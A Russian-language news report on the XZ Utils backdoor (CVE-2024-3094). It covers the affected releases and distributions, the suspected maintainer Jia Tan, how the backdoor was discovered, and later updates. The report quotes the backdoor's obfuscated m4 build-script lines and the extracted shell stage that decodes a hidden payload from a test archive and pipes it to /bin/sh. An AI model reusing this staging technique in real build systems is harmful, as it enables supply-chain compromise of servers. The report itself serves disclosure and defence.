В пакете XZ Utils, включающем библиотеку liblzma и утилиты для работы со сжатыми данными в формате ".xz", выявлен бэкдор (CVE-2024-3094), позволяющий перехватывать и модифицировать данные, обрабатываемые приложениями, связанными с библиотекой liblzma. Основной целью бэкдора является сервер OpenSSH, в некоторых дистрибутивах связанный с библиотекой libsystemd, которая, в свою очередь, использует liblzma. Связывание sshd с уязвимой библиотекой позволяет злоумышленникам получить доступ к SSH-серверу без аутентификации.

Бэкдор присутствовал в официальных выпусках xz 5.6.0 и 5.6.1, опубликованных 24 февраля и 9 марта, которые успели попасть в состав некоторых дистрибутивов и репозиториев, например, Gentoo, Arch Linux, Debian sid/unstable, Fedora Rawhide и 40-beta, openSUSE factory и tumbleweed, LibreELEC, Alpine edge, Solus, CRUX, Cygwin, MSYS2 mingw, HP-UX, Homebrew, KaOS, NixOS unstable, OpenIndiana, Parabola, PCLinuxOS, OpenMandriva cooker и rolling, pkgsrc current, Slackware current, Manjaro, Void Linux. Всем пользователям выпусков xz 5.6.0 и 5.6.1 рекомендуется срочно откатиться как минимум на версию 5.4.6, но желательно на 5.4.1, как последний выпуск, опубликованный прошлым сопровождающим.

Из сглаживающих проблему факторов можно отметить то, что версия liblzma c бэкдором не успела войти в состав стабильных выпусков крупных дистрибутивов, но затронула openSUSE Tumbleweed. Arch Linux и Gentoo использовали уязвимую версию xz, но не подвержены атаке, так как не применяют к OpenSSH патч для поддержки systemd-notify, приводящий к связыванию sshd к liblzma. Для Fedora 40-beta был опубликован пакет с xz 5.6.0, но из-за проблем с valgrind он был собран без поддержки IFUNC ('configure --disable-ifuncs'), т.е. бэкдор в нём был неработоспособен. Ubuntu и RHEL/CentOS не импортировали проблемные версии в свои репозитории. Бэкдор затрагивает только системы x86_64 на базе ядра Linux и Си-библиотеки Glibc, в которых sshd связывается с libsystemd для поддержки механизма sd_notify.

Код активации бэкдора был спрятан в m4-макросах из файла build-to-host.m4, используемого инструментарием automake при сборке. При сборке в ходе выполнения запутанных обфусцированных операций на основе архивов bad-3-corrupt_lzma2.xz и good-large_compressed.lzma, добавленных под предлогом использования в тестах корректности работы распаковщика, формировался объектный файл с вредоносным кодом, который включался в состав библиотеки liblzma и изменял логику работы некоторых её функций.

Активирующие бэкдор m4-макросы входили в состав tar-архивов релизов, но отсутствовали в Git-репозитории (были добавлены в .gitignore). При этом вредоносные тестовые архивы присутствовали в репозитории, т.е. внедривший бэкдор имел доступ как к репозиторию, так и к процессам формирования релизов. Более того, изначально файлы bad-3-corrupt_lzma2.xz и good-large_compressed.lzma были загружены 23 февраля перед релизом xz 5.6.0, а 9 марта обновлены перед релизом xz 5.6.1.

При использовании liblzma в приложениях вредоносные изменения могли использоваться для перехвата или модификации данных, а также для влияния на работу sshd. В частности, вредоносный код подменял функцию RSA_public_decrypt для обхода процесса аутентификации в sshd. Для неявного вызова и перехвата функций в бэкдоре применялся механизм IFUNC, присутствующий в Glibc. Бэкдор включал защиту от обнаружения и не проявлял себя при выставленных переменных окружения LANG и TERM (т.е. при запуске процесса в терминале) и не выставленных переменных окружения LD_DEBUG и LD_PROFILE, а активировался только при выполнении исполняемого файла /usr/sbin/sshd. В бэкдоре также имелись средства обнаружения запуска в отладочных окружениях.

В файле m4/build-to-host.m4 использовались конструкции

  gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
...
  gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'

В первой конструкции операция grep находила файл tests/files/bad-3-corrupt_lzma2.xz, при распаковке которого формировался сценарий, распаковывающий объектный файл из второго архива:

####Hello####
#345U211267$^D330^W
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 .... && (head -c +1024 >/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####

Каким образом злоумышленникам удалось получить доступ к инфраструктуре проекта xz пока до конца не выяснено, но по предварительным данным внедрение бэкдора осуществлено целенаправленно одним из активных разработчиков проекта xz. Так же пока не ясно как много пользователей и проектов были скомпрометированы в результате действия бэкдора. Предполагаемый автор бэкдора (JiaT75 - Jia Tan), разместивший в репозитории архивы с вредоносным кодом и затем их обновивший, переписывался с разработчиками Fedora и отправлял pull-запросы в Debian, связанные с переходом дистрибутивов на ветку xz 5.6.0.

Разработчик Jia Tan не вызвал подозрений, так как участвовал в разработке xz, имел статус "co-maintainer" на протяжении последних двух лет, выпускал релизы начиная с xz 5.4.2 и являлся вторым участником проекта по числу внесённых изменений. Помимо проекта xz предполагаемый автор бэкдора также участвовал в разработке пакетов xz-java и xz-embedded. Более того, Jia Tan несколько дней назад был включён в число мэйнтейнеров проекта XZ Embedded, используемого в ядре Linux.

Вредоносное изменение было выявлено после анализа излишнего потребления CPU и ошибок, выдаваемых valgrind, при подключении через ssh к системам на базе Debian sid. Примечательно, что в релиз xz 5.6.1 были включены изменения, подготовленные предполагаемым автором бэкдора в ответ на жалобы о замедлении работы и сбоях sshd, возникшие после обновления до версии xz 5.6.0 с бэкдором. Кроме того, в прошлом году Jia Tan внёс изменения, несовместимые с режимом проверки "-fsanitize=address", что привело к его отключению при fuzzing-тестировании.

Дополнение 1: GitHub полностью заблокировал репозитории xz, xz-java и xz-embedded, которые теперь недоступны для анализа и загрузки прошлых версий. Также заблокирован официальный сайт проекта xz.tukaani.org. На archive.org и сайте проекта осталась последняя рабочая копия.

Дополнение 2: В 2021 году Jia Tan передал изменение в проект libarchive и добился замены вызова safe_fprintf на небезопасный fprintf (несколько часов назад изменение было отменено).

Дополнение 3: Опубликован разбор событий, способствующих продвижению бэкдора в пакет xz.

Дополнение 4: Lasse Collin, прошлый сопровождающий проекта xz, передавший права Jia Tan, опубликовал заявление, в котором подтвердил, что архивы с содержащими бэкдор релизами были созданы и подписаны Jia Tan. Он также сообщил об удалении поддомена xz.tukaani.org (сайт xz будет возвращён на основной сервер tukaani.org) и упомянул, что его учётную запись на GitHub заблокировали. Lasse Collin единолично контролирует сайт tukaani.org и репозитории git.tukaani.org, а Jia Tan контролировал только проект на GitHub и хост xz.tukaani.org, но не имел доступа к серверу tukaani.org.

Дополнение 5: Разбор логики активации и работы бэкдора в пакете xz.

Дополнение 6: В сборочном сценарии CMakeLists.txt выявлено вредоносное изменение, не позволяющее использовать в xz механизм изоляции приложений Landlock.

Дополнение 7: По мотивам выявленного бэкдора подготовлен инструментарий xzbot, включающий в себя: honeypot для создания фиктивных серверов, притворяющихся уязвимыми для выявления попыток подключения злоумышленников; патч для замены открытого ключа в бэкдоре внутри liblzma.so на свой ключ (чтобы подключаться к бэкдору по своему закрытому ключу); демонстрацию для инициирования выполнения кода в модифицированном бэкдоре, используя свой закрытый ключ.